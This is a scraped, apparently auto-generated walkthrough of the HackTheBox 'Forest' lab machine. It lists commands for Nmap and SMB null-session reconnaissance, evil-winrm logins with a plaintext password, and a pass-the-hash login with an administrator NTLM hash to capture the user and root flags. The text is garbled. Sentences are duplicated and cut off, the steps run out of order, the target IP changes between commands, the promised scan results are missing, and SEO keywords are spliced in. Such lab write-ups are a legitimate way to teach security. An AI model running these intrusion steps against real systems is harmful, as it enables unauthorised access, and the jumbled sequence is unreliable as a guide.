The first step in compromising any box is to gather as much information as possible. This includes performing an Nmap scan to identify open ports and services.
nmap -sV -sC -oA forest 10.10.10.74
The scan results reveal the following:
evil-winrm -i 10.10.10.161 -u svc-alfresco -p s3rvice
✅ User flag at C:\Users\svc-alfresco\Desktop\user.txt forest hackthebox walkthrough best
Use evil-winrm again with the administrator hash:
evil-winrm -i 10.10.10.161 -u administrator -H 32693b11e6aa90f43dfa1e816ec0a1c8
Now list the root directory:
cd C:\Users\Administrator\Desktop
type root.txt
Root flag obtained.
We have valid credentials. Let's check if we can access the machine. Since WinRM is open, we check if svc-alfresco has remote access permissions. The first step in compromising any box is
We can use evil-winrm to attempt a login.
evil-winrm -u svc-alfresco -p s3rvice -i 10.10.10.161
Result: Access granted!
We now have a PowerShell shell on the Domain Controller. We can grab the user.txt flag from the Desktop of svc-alfresco.
We start with Nmap. The "best" approach is not to scan all ports blindly, but to target AD-specific services. The scan results reveal the following:
smbclient -L //10.10.10.161 -N
# No shares accessible without creds, but null session works
Trebuie să fii autentificat pentru a publica un comentariu.